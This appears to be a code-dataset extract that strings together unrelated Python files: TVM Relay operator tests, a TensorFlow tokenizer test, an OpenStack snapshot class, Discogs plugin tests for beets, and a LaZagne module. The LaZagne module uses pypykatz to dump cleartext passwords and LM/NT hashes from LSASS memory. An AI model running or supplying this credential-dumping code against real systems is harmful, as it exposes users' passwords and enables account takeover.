for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
intrp2 = relay.create_executor("debug", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5)
op_res2 = intrp2.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res2.asnumpy(), ref_res, rtol=1e-5)
def batch_flatten(data):
shape = data.shape
target_dim = 1
for i in range(len(shape) - 1):
target_dim = target_dim * shape[i + 1]
return np.reshape(data, (shape[0], target_dim))
def test_batch_flatten():
t1 = relay.TensorType((5, 10, 5))
x = relay.Var("x", t1)
func = relay.Function([x], relay.nn.batch_flatten(x))
data = np.random.rand(5, 10, 5).astype(t1.dtype)
ref_res = batch_flatten(data)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(data)
np.testing.assert_allclose(op_res.asnumpy(), ref_res, rtol=0.01)
def _test_upsampling(layout, method, align_corners=False):
n, c, h, w = tvm.size_var("n"), 16, 32, 32
scale_h = 2.0
scale_w = 2.0
dtype = "float32"
def get_shape():
if layout == "NCHW":
return (c, h, w), (c, int(round(h*scale_h)), int(round(w*scale_w)))
else:
return (h, w, c), (int(round(h*scale_h)), int(round(w*scale_w)), c)
ishape, oshape = get_shape()
x = relay.var("x", relay.TensorType((n,) + ishape, dtype))
y = relay.nn.upsampling(x, scale_h=scale_h, scale_w=scale_w, layout=layout,
method=method, align_corners=align_corners)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n,) + oshape, dtype)
dshape = (1,) + ishape
x = relay.var("x", shape=dshape)
y = relay.nn.upsampling(x, scale_h=scale_h, scale_w=scale_w, layout=layout,
method=method, align_corners=align_corners)
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
if method == "nearest_neighbor":
ref = topi.testing.upsampling_python(data, (scale_h, scale_w), layout)
else:
ref = topi.testing.bilinear_resize_python(data, (int(round(h*scale_h)),
int(round(w*scale_w))), layout)
for target, ctx in ctx_list():
executor = relay.create_executor("graph", ctx=ctx, target=target)
out = executor.evaluate(func)(data)
tvm.testing.assert_allclose(out.asnumpy(), ref, rtol=1e-5, atol=1e-5)
def test_upsampling():
_test_upsampling("NCHW", "nearest_neighbor")
_test_upsampling("NCHW", "bilinear", True)
_test_upsampling("NHWC", "nearest_neighbor")
_test_upsampling("NHWC", "bilinear", True)
def _test_upsampling3d(layout, method, coordinate_transformation_mode="half_pixel"):
n, c, d, h, w = tvm.size_var("n"), 8, 16, 16, 16
scale_d = 2.0
scale_h = 2.0
scale_w = 2.0
dtype = "float32"
def get_shape():
if layout == "NCDHW":
return (c, d, h, w), (c, int(round(d*scale_d)), int(round(h*scale_h)),\
int(round(w*scale_w)))
else:
return (d, h, w, c), (int(round(d*scale_d)), int(round(h*scale_h)),\
int(round(w*scale_w)), c)
ishape, oshape = get_shape()
x = relay.var("x", relay.TensorType((n,) + ishape, dtype))
y = relay.nn.upsampling3d(x, scale_d=scale_d, scale_h=scale_h, scale_w=scale_w,\
layout=layout, method=method,\
coordinate_transformation_mode=coordinate_transformation_mode)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n,) + oshape, dtype)
dshape = (1,) + ishape
x = relay.var("x", shape=dshape)
y = relay.nn.upsampling3d(x, scale_d=scale_d, scale_h=scale_h, scale_w=scale_w,\
layout=layout, method=method,\
coordinate_transformation_mode=coordinate_transformation_mode)
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
if method == "nearest_neighbor":
ref = topi.testing.upsampling3d_python(data, (scale_d, scale_h, scale_w), layout)
else:
ref = topi.testing.trilinear_resize3d_python(data, (int(round(d*scale_d)),\
int(round(h*scale_h)),\
int(round(w*scale_w))), layout)
for target, ctx in ctx_list():
executor = relay.create_executor("graph", ctx=ctx, target=target)
out = executor.evaluate(func)(data)
tvm.testing.assert_allclose(out.asnumpy(), ref, rtol=1e-5, atol=1e-5)
def test_upsampling3d():
_test_upsampling3d("NCDHW", "nearest_neighbor")
_test_upsampling3d("NCDHW", "trilinear", "align_corners")
_test_upsampling3d("NDHWC", "nearest_neighbor")
_test_upsampling3d("NDHWC", "trilinear", "align_corners")
def test_conv2d_int8_intrinsics():
def _compile(ic, oc, target, data_layout, kernel_layout, dtypes):
input_dtype, weight_dtype, output_dtype = dtypes
n, h, w, ch, cw = 1, 64, 64, 3, 3
if data_layout == 'NCHW':
data_shape = (n, ic, h, w)
x = relay.var("x", relay.TensorType(data_shape, input_dtype))
elif data_layout == 'NHWC':
data_shape = (n, h, w, ic)
x = relay.var("x", relay.TensorType(data_shape, input_dtype))
else:
raise ValueError('Not supported')
if kernel_layout == 'OIHW':
kernel_shape = (oc, ic, ch, cw)
elif kernel_layout == 'HWIO':
kernel_shape = (ch, cw, ic, oc)
else:
raise ValueError('Not supported')
weight = relay.var("weight", relay.TensorType(kernel_shape, weight_dtype))
y = relay.nn.conv2d(x, weight,
kernel_size=(ch, cw),
channels=oc,
padding=(1, 1),
dilation=(1, 1),
data_layout=data_layout,
kernel_layout=kernel_layout,
out_dtype=output_dtype)
func = relay.Function([x, weight], y)
wdata = np.random.rand(*kernel_shape) * 10
parameters = {"weight": tvm.nd.array(wdata.astype(weight_dtype))}
with relay.build_config(opt_level=3):
graph, lib, params = relay.build(func, target, params=parameters)
assembly = lib.get_source("asm")
return assembly
def _has_fast_int8_instructions(asm, target):
if 'skylake-avx512' in target:
return "pmaddubs" in asm
elif 'cascadelake' in target:
return "vpdpbusd" in asm
else:
assert False, "Target should be Skylake or Cascadelake"
# compile conv2d for x86 (skylake, cascadelake) and test assembly contains *pmadd* instructions
targets = ["llvm -mcpu=skylake-avx512", "llvm -mcpu=cascadelake"]
llvm_version = tvm.codegen.llvm_version_major()
for target in targets:
if llvm_version >= 8:
dtypes = ('uint8', 'int8', 'int32')
# Sweep the input channels to check int8 robustness
# Input channels should be a multiple of 4 internally.
for ic in [1, 4, 6]:
asm = _compile(ic=ic, oc=16, target=target, data_layout="NCHW",
kernel_layout='OIHW',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
for ic in [1, 4, 6]:
asm = _compile(ic=ic, oc=16, target=target, data_layout="NHWC",
kernel_layout='HWIO',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
# Sweep the output channels to check int8 robustness
# Output channels should be a multiple of 16 internally.
for oc in [4, 16, 20]:
asm = _compile(ic=8, oc=oc, target=target, data_layout="NCHW",
kernel_layout='OIHW',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
for oc in [4, 16, 20]:
asm = _compile(ic=8, oc=oc, target=target, data_layout="NHWC",
kernel_layout='HWIO',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
# Check that both non-divisible oc and ic work
asm = _compile(ic=17, oc=29, target=target, data_layout="NCHW", kernel_layout='OIHW',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
asm = _compile(ic=17, oc=29, target=target, data_layout="NHWC", kernel_layout='HWIO',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
# Check that int8 x int8 goes through legalization so that fast instructions can be picked up.
for target in targets:
if llvm_version >= 8:
dtypes = (('int8', 'int8', 'int32'))
# Check that both non-divisible oc and ic work
asm = _compile(ic=17, oc=29, target=target, data_layout="NCHW", kernel_layout='OIHW',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
asm = _compile(ic=17, oc=29, target=target, data_layout="NHWC", kernel_layout='HWIO',
dtypes=dtypes)
assert _has_fast_int8_instructions(asm, target)
# Ensure that code is generated when datatypes are not HW supported.
dtypes = ('uint8', 'uint8', 'int32')
asm = _compile(ic=16, oc=32, target=target, data_layout="NHWC", kernel_layout='HWIO',
dtypes=dtypes)
# Check that intrinisic is not present in the assembly.
assert not _has_fast_int8_instructions(asm, target)
# Check that a vectorized instruction is generated for older Intel
# generations, because we default to NCHWc layout.
target = "llvm -mcpu=core-avx2"
fast_int8_dtypes = ('uint8', 'int8', 'int32')
asm = _compile(ic=16, oc=32, target=target, data_layout="NCHW", kernel_layout='OIHW',
dtypes=fast_int8_dtypes)
# Check that vector int mult and add instructions are generated.
assert "vpmulld" in asm and "vpadd" in asm
def test_depthwise_conv2d_int8():
input_dtype = 'uint8'
weight_dtype = 'int8'
output_dtype = 'int32'
data_shape = (1, 64, 56, 56)
x = relay.var("x", relay.TensorType(data_shape, input_dtype))
kernel_shape = (64, 1, 3, 3)
weight = relay.var("weight", relay.TensorType(kernel_shape, weight_dtype))
y = relay.nn.conv2d(x, weight,
kernel_size=(3, 3),
groups=64,
padding=(1, 1),
dilation=(1, 1),
out_dtype=output_dtype)
func = relay.Function([x, weight], y)
wdata = np.random.rand(*kernel_shape) * 10
parameters = {"weight": tvm.nd.array(wdata.astype(weight_dtype))}
targets = ["llvm -mcpu=skylake-avx512", "llvm -mcpu=cascadelake"]
llvm_version = tvm.codegen.llvm_version_major()
for target in targets:
if llvm_version >= 8:
with relay.build_config(opt_level=3):
graph, lib, params = relay.build(func, target, params=parameters)
def test_bitserial_conv2d_infer_type():
# Basic shape test with ambiguous batch.
n, c, h, w = tvm.size_var("n"), 32, 224, 224
x = relay.var("x", relay.ty.TensorType((n, c, h, w), "int16"))
w = relay.var("w", relay.ty.TensorType((32, 32, 3, 3), "int16"))
y = relay.nn.bitserial_conv2d(
x, w, kernel_size=(3, 3), padding=(0, 0), channels=32)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 32, 222, 222), "int16")
def test_bitpack_infer_type():
# Test axis packing shape inference.
o, i, h, w = 32, 32, 128, 128
x = relay.var("x", relay.ty.TensorType((o, i, h, w), "int16"))
y = relay.nn.bitpack(x, bit_axis=4, pack_axis=1, pack_type='uint16', bits=1)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(32, 2, 128, 128, 1), "uint16")
if __name__ == "__main__":
test_pool1d()
test_pool2d()
test_pool3d()
test_avg_pool2d_no_count_pad()
test_lrn()
test_l2_normalize()
test_conv1d_infer_type()
test_conv2d_infer_type()
test_conv3d_infer_type()
test_bitpack_infer_type()
test_upsampling_infer_type()
test_upsampling3d_infer_type()
test_flatten_infer_type()
test_pad_infer_type()
test_pad_run()
test_conv2d_transpose_infer_type()
test_conv2d_transpose_nchw_run()
test_conv2d_transpose_nhwc_run()
test_conv1d_transpose_ncw_run()
test_conv1d_run()
test_conv2d_run()
test_conv2d_winograd()
test_conv3d_run()
test_conv3d_ndhwc_run()
test_bitserial_conv2d_infer_type()
test_batch_flatten()
test_upsampling()
test_upsampling3d()
test_conv2d_int8_intrinsics()
test_depthwise_conv2d_int8()
| 1.703125 | 2 |
official/nlp/transformer/utils/tokenizer_test.py | hjkim-haga/TF-OD-API | 1 | 1150 | # Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Subtokenizer and string helper methods."""
import collections
import tempfile
import tensorflow as tf
from official.nlp.transformer.utils import tokenizer
class SubtokenizerTest(tf.test.TestCase):
def _init_subtokenizer(self, vocab_list):
temp_file = tempfile.NamedTemporaryFile(delete=False)
with tf.io.gfile.GFile(temp_file.name, "w") as w:
for subtoken in vocab_list:
w.write("'%s'" % subtoken)
w.write("\n")
return tokenizer.Subtokenizer(temp_file.name, reserved_tokens=[])
def test_encode(self):
vocab_list = ["123_", "test", "ing_"]
subtokenizer = self._init_subtokenizer(vocab_list)
s = "testing 123"
encoded_list = subtokenizer.encode(s)
self.assertEqual([1, 2, 0], encoded_list)
def test_decode(self):
vocab_list = ["123_", "test", "ing_"]
subtokenizer = self._init_subtokenizer(vocab_list)
encoded_list = [1, 2, 0] # testing 123
decoded_str = subtokenizer.decode(encoded_list)
self.assertEqual("testing 123", decoded_str)
def test_subtoken_ids_to_tokens(self):
vocab_list = ["123_", "test", "ing_"]
subtokenizer = self._init_subtokenizer(vocab_list)
encoded_list = [1, 2, 0] # testing 123
token_list = subtokenizer._subtoken_ids_to_tokens(encoded_list)
self.assertEqual([u"testing", u"123"], token_list)
class StringHelperTest(tf.test.TestCase):
def test_split_string_to_tokens(self):
text = "test? testing 123."
tokens = tokenizer._split_string_to_tokens(text,
tokenizer._ALPHANUMERIC_CHAR_SET)
self.assertEqual(["test", "? ", "testing", "123", "."], tokens)
def test_join_tokens_to_string(self):
tokens = ["test", "? ", "testing", "123", "."]
s = tokenizer._join_tokens_to_string(tokens,
tokenizer._ALPHANUMERIC_CHAR_SET)
self.assertEqual("test? testing 123.", s)
def test_escape_token(self):
token = u"abc_\\4"
alphabet = set("abc_\\u;")
escaped_token = tokenizer._escape_token(token, alphabet)
self.assertEqual("abc\\u\\\\\\52;_", escaped_token)
def test_unescape_token(self):
escaped_token = u"Underline: \\u, Backslash: \\\\, Unicode: \\52;"
unescaped_token = tokenizer._unescape_token(escaped_token)
self.assertEqual("Underline: _, Backslash: \\, Unicode: 4", unescaped_token)
def test_list_to_index_dict(self):
lst = ["test", "strings"]
d = tokenizer._list_to_index_dict(lst)
self.assertDictEqual({"test": 0, "strings": 1}, d)
def test_split_token_to_subtokens(self):
token = "abc"
subtoken_dict = {"a": 0, "b": 1, "c": 2, "ab": 3}
max_subtoken_length = 2
subtokens = tokenizer._split_token_to_subtokens(token, subtoken_dict,
max_subtoken_length)
self.assertEqual(["ab", "c"], subtokens)
def test_generate_alphabet_dict(self):
s = ["testing", "123"]
reserved_tokens = ["???"]
alphabet = tokenizer._generate_alphabet_dict(s, reserved_tokens)
self.assertIn("?", alphabet)
self.assertIn("t", alphabet)
self.assertIn("e", alphabet)
self.assertIn("s", alphabet)
self.assertIn("i", alphabet)
self.assertIn("n", alphabet)
self.assertIn("g", alphabet)
self.assertIn("1", alphabet)
self.assertIn("2", alphabet)
self.assertIn("3", alphabet)
def test_count_and_gen_subtokens(self):
token_counts = {"abc": 5}
alphabet = set("abc_")
subtoken_dict = {"a": 0, "b": 1, "c": 2, "_": 3}
max_subtoken_length = 2
subtoken_counts = tokenizer._count_and_gen_subtokens(
token_counts, alphabet, subtoken_dict, max_subtoken_length)
self.assertIsInstance(subtoken_counts, collections.defaultdict)
self.assertDictEqual(
{
"a": 5,
"b": 5,
"c": 5,
"_": 5,
"ab": 5,
"bc": 5,
"c_": 5,
"abc": 5,
"bc_": 5,
"abc_": 5
}, subtoken_counts)
def test_filter_and_bucket_subtokens(self):
subtoken_counts = collections.defaultdict(int, {
"a": 2,
"b": 4,
"c": 1,
"ab": 6,
"ac": 3,
"abbc": 5
})
min_count = 3
subtoken_buckets = tokenizer._filter_and_bucket_subtokens(
subtoken_counts, min_count)
self.assertEqual(len(subtoken_buckets[0]), 0)
self.assertEqual(set("b"), subtoken_buckets[1])
self.assertEqual(set(["ab", "ac"]), subtoken_buckets[2])
self.assertEqual(len(subtoken_buckets[3]), 0)
self.assertEqual(set(["abbc"]), subtoken_buckets[4])
def test_gen_new_subtoken_list(self):
subtoken_counts = collections.defaultdict(int, {
"translate": 10,
"t": 40,
"tr": 16,
"tra": 12
})
min_count = 5
alphabet = set("translate")
reserved_tokens = ["reserved", "tokens"]
subtoken_list, max_token_length = tokenizer._gen_new_subtoken_list(
subtoken_counts, min_count, alphabet, reserved_tokens)
# Check that "tra" isn"t in the list (its count should be decremented to 2,
# so it should not be added to the canddiate list).
self.assertNotIn("tra", subtoken_list)
self.assertIn("tr", subtoken_list)
self.assertIn("t", subtoken_list)
self.assertEqual(len("translate"), max_token_length)
def test_generate_subtokens(self):
token_counts = {"ab": 1, "bc": 3, "abc": 5}
alphabet = set("abc_")
min_count = 100
num_iterations = 1
reserved_tokens = ["reserved", "tokens"]
vocab_list = tokenizer._generate_subtokens(token_counts, alphabet,
min_count, num_iterations,
reserved_tokens)
# Check that reserved tokens are at the front of the list
self.assertEqual(vocab_list[:2], reserved_tokens)
# Check that each character in alphabet is in the vocab list
for c in alphabet:
self.assertIn(c, vocab_list)
if __name__ == "__main__":
tf.test.main()
| 2.515625 | 3 |
api/api/form7_searching_utils/__init__.py | bcgov/court-of-appeal | 0 | 1151 | <filename>api/api/form7_searching_utils/__init__.py
from .form7_search import Form7Search
from .parse_form7 import Form7Parsing
| 1.09375 | 1 |
soil/build/lib/soil/openstack/snapshot.py | JackDan9/soil | 1 | 1152 | <gh_stars>1-10
# Copyright 2020 Soil, Inc.
from soil.openstack.base import DataBase
from soil.openstack.base import SourceBase
class SnapshotData(DataBase):
"""A class for openstack snapshot data"""
def __init__(self, data):
self.data = data['snapshot']
class Snapshot(SourceBase):
"""A class for openstack snapshot"""
def __init__(self, plugin, source_id):
super(Snapshot, self).__init__(plugin, source_id)
self._snapshot_obj = None
@property
def snapshot_obj(self):
if self._snapshot_obj is not None:
return self._snapshot_obj
self._snapshot_obj = SnapshotData(self.show())
return self._snapshot_obj
def show(self):
return self.plugin.cinder.show_snapshot(self.source_id)
def delete(self):
self.plugin.cinder.delete_snapshot(self.source_id)
def is_created(self):
snapshot_info = self.show()
status = snapshot_info['snapshot']['status']
if status in ('available', ):
return True
self._check_failed_status(status)
return False
def is_delete(self):
pass
| 2.390625 | 2 |
Z - Tool Box/LaZagne/Windows/lazagne/softwares/windows/ppypykatz.py | dfirpaul/Active-Directory-Exploitation-Cheat-Sheet-1 | 1,290 | 1153 | # -*- coding: utf-8 -*-
# Thanks to @skelsec for his awesome tool Pypykatz
# Checks his project here: https://github.com/skelsec/pypykatz
import codecs
import traceback
from lazagne.config.module_info import ModuleInfo
from lazagne.config.constant import constant
from pypykatz.pypykatz import pypykatz
class Pypykatz(ModuleInfo):
"""
Pypykatz dumps all secrets from the lsass.exe memory
It does not work if:
- LSASS is running as a protected process
- A security product blocks this access
"""
def __init__(self):
ModuleInfo.__init__(self, 'pypykatz', 'windows', system_module=True)
def run(self):
mimi = None
try:
mimi = pypykatz.go_live()
except Exception:
self.debug(traceback.format_exc())
if mimi:
results = {}
logon_sessions = mimi.to_dict().get('logon_sessions', [])
for logon_session in logon_sessions:
# Right now kerberos_creds, dpapi_creds results are not used
user = logon_sessions[logon_session]
# Get cleartext password
for i in ['credman_creds', 'ssp_creds', 'livessp_creds', 'tspkg_creds', 'wdigest_creds']:
for data in user.get(i, []):
if all((data['username'], data['password'])):
login = data['username']
if login not in results:
results[login] = {}
results[login]['Type'] = i
results[login]['Domain'] = data.get('domainname', 'N/A')
results[login]['Password'] = data['password']
# msv_creds to get sha1 user hash
for data in user.get('msv_creds', []):
if data['username']:
login = data['username']
else:
login = user['username']
if login not in results:
results[login] = {}
if data['SHAHash']:
results[login]['Shahash'] = codecs.encode(data['SHAHash'], 'hex')
if data['LMHash']:
results[login]['Lmhash'] = codecs.encode(data['LMHash'], 'hex')
if data['NThash']:
results[login]['Nthash'] = codecs.encode(data['NThash'], 'hex')
constant.pypykatz_result = results
pwd_found = []
for user in results:
results[user]['Login'] = user
pwd_found.append(results[user])
return pwd_found
| 2.09375 | 2 |
test/test_discogs.py | mglukhovsky/beets | 0 | 1154 | <filename>test/test_discogs.py
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, <NAME>.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for discogs plugin.
"""
from __future__ import division, absolute_import, print_function
import unittest
from test import _common
from test._common import Bag
from test.helper import capture_log
from beetsplug.discogs import DiscogsPlugin
class DGAlbumInfoTest(_common.TestCase):
def _make_release(self, tracks=None):
"""Returns a Bag that mimics a discogs_client.Release. The list
of elements on the returned Bag is incomplete, including just
those required for the tests on this class."""
data = {
'id': 'ALBUM ID',
'uri': 'ALBUM URI',
'title': 'ALBUM TITLE',
'year': '3001',
'artists': [{
'name': 'ARTIST NAME',
'id': 'ARTIST ID',
'join': ','
}],
'formats': [{
'descriptions': ['FORMAT DESC 1', 'FORMAT DESC 2'],
'name': 'FORMAT',
'qty': 1
}],
'styles': [
'STYLE1', 'STYLE2'
],
'labels': [{
'name': 'LABEL NAME',
'catno': 'CATALOG NUMBER',
}],
'tracklist': []
}
if tracks:
for recording in tracks:
data['tracklist'].append(recording)
return Bag(data=data,
# Make some fields available as properties, as they are
# accessed by DiscogsPlugin methods.
title=data['title'],
artists=[Bag(data=d) for d in data['artists']])
def _make_track(self, title, position='', duration='', type_=None):
track = {
'title': title,
'position': position,
'duration': duration
}
if type_ is not None:
# Test samples on discogs_client do not have a 'type_' field, but
# the API seems to return it. Values: 'track' for regular tracks,
# 'heading' for descriptive texts (ie. not real tracks - 12.13.2).
track['type_'] = type_
return track
def _make_release_from_positions(self, positions):
"""Return a Bag that mimics a discogs_client.Release with a
tracklist where tracks have the specified `positions`."""
tracks = [self._make_track('TITLE%s' % i, position) for
(i, position) in enumerate(positions, start=1)]
return self._make_release(tracks)
def test_parse_media_for_tracks(self):
tracks = [self._make_track('TITLE ONE', '1', '01:01'),
self._make_track('TITLE TWO', '2', '02:02')]
release = self._make_release(tracks=tracks)
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.media, 'FORMAT')
self.assertEqual(t[0].media, d.media)
self.assertEqual(t[1].media, d.media)
def test_parse_medium_numbers_single_medium(self):
release = self._make_release_from_positions(['1', '2'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 1)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium, 1)
self.assertEqual(t[0].medium_total, 2)
def test_parse_medium_numbers_two_mediums(self):
release = self._make_release_from_positions(['1-1', '2-1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 2)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 1)
self.assertEqual(t[1].medium, 2)
self.assertEqual(t[1].medium_total, 1)
def test_parse_medium_numbers_two_mediums_two_sided(self):
release = self._make_release_from_positions(['A1', 'B1', 'C1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 2)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[1].medium, 1)
self.assertEqual(t[1].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[2].medium, 2)
self.assertEqual(t[2].medium_total, 1)
self.assertEqual(t[2].medium_index, 1)
def test_parse_track_indices(self):
release = self._make_release_from_positions(['1', '2'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[0].index, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[1].index, 2)
self.assertEqual(t[1].medium_total, 2)
def test_parse_track_indices_several_media(self):
release = self._make_release_from_positions(['1-1', '1-2', '2-1',
'3-1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 3)
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[0].index, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[1].index, 2)
self.assertEqual(t[1].medium_total, 2)
self.assertEqual(t[2].medium_index, 1)
self.assertEqual(t[2].index, 3)
self.assertEqual(t[2].medium_total, 1)
self.assertEqual(t[3].medium_index, 1)
self.assertEqual(t[3].index, 4)
self.assertEqual(t[3].medium_total, 1)
def test_parse_position(self):
"""Test the conversion of discogs `position` to medium, medium_index
and subtrack_index."""
# List of tuples (discogs_position, (medium, medium_index, subindex)
positions = [('1', (None, '1', None)),
('A12', ('A', '12', None)),
('12-34', ('12-', '34', None)),
('CD1-1', ('CD1-', '1', None)),
('1.12', (None, '1', '12')),
('12.a', (None, '12', 'A')),
('12.34', (None, '12', '34')),
('1ab', (None, '1', 'AB')),
# Non-standard
('IV', ('IV', None, None)),
]
d = DiscogsPlugin()
for position, expected in positions:
self.assertEqual(d.get_track_index(position), expected)
def test_parse_tracklist_without_sides(self):
"""Test standard Discogs position 12.2.9#1: "without sides"."""
release = self._make_release_from_positions(['1', '2', '3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_with_sides(self):
"""Test standard Discogs position 12.2.9#2: "with sides"."""
release = self._make_release_from_positions(['A1', 'A2', 'B1', 'B2'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1) # 2 sides = 1 LP
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_multiple_lp(self):
"""Test standard Discogs position 12.2.9#3: "multiple LP"."""
release = self._make_release_from_positions(['A1', 'A2', 'B1', 'C1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2) # 3 sides = 1 LP + 1 LP
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_multiple_cd(self):
"""Test standard Discogs position 12.2.9#4: "multiple CDs"."""
release = self._make_release_from_positions(['1-1', '1-2', '2-1',
'3-1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 3)
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_non_standard(self):
"""Test non standard Discogs position."""
release = self._make_release_from_positions(['I', 'II', 'III', 'IV'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_subtracks_dot(self):
"""Test standard Discogs position 12.2.9#5: "sub tracks, dots"."""
release = self._make_release_from_positions(['1', '2.1', '2.2', '3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
release = self._make_release_from_positions(['A1', 'A2.1', 'A2.2',
'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_letter(self):
"""Test standard Discogs position 12.2.9#5: "sub tracks, letter"."""
release = self._make_release_from_positions(['A1', 'A2a', 'A2b', 'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
release = self._make_release_from_positions(['A1', 'A2.a', 'A2.b',
'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_extra_material(self):
"""Test standard Discogs position 12.2.9#6: "extra material"."""
release = self._make_release_from_positions(['1', '2', 'Video 1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_indices(self):
"""Test parsing of subtracks that include index tracks."""
release = self._make_release_from_positions(['', '', '1.1', '1.2'])
# Track 1: Index track with medium title
release.data['tracklist'][0]['title'] = 'MEDIUM TITLE'
# Track 2: Index track with track group title
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(d.tracks[0].disctitle, 'MEDIUM TITLE')
self.assertEqual(len(d.tracks), 1)
self.assertEqual(d.tracks[0].title, 'TRACK GROUP TITLE')
def test_parse_tracklist_subtracks_nested_logical(self):
"""Test parsing of subtracks defined inside a index track that are
logical subtracks (ie. should be grouped together into a single track).
"""
release = self._make_release_from_positions(['1', '', '3'])
# Track 2: Index track with track group title, and sub_tracks
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
release.data['tracklist'][1]['sub_tracks'] = [
self._make_track('TITLE ONE', '2.1', '01:01'),
self._make_track('TITLE TWO', '2.2', '02:02')
]
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
self.assertEqual(d.tracks[1].title, 'TRACK GROUP TITLE')
def test_parse_tracklist_subtracks_nested_physical(self):
"""Test parsing of subtracks defined inside a index track that are
physical subtracks (ie. should not be grouped together).
"""
release = self._make_release_from_positions(['1', '', '4'])
# Track 2: Index track with track group title, and sub_tracks
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
release.data['tracklist'][1]['sub_tracks'] = [
self._make_track('TITLE ONE', '2', '01:01'),
self._make_track('TITLE TWO', '3', '02:02')
]
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 4)
self.assertEqual(d.tracks[1].title, 'TITLE ONE')
self.assertEqual(d.tracks[2].title, 'TITLE TWO')
def test_parse_tracklist_disctitles(self):
"""Test parsing of index tracks that act as disc titles."""
release = self._make_release_from_positions(['', '1-1', '1-2', '',
'2-1'])
# Track 1: Index track with medium title (Cd1)
release.data['tracklist'][0]['title'] = 'MEDIUM TITLE CD1'
# Track 4: Index track with medium title (Cd2)
release.data['tracklist'][3]['title'] = 'MEDIUM TITLE CD2'
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2)
self.assertEqual(d.tracks[0].disctitle, 'MEDIUM TITLE CD1')
self.assertEqual(d.tracks[1].disctitle, 'MEDIUM TITLE CD1')
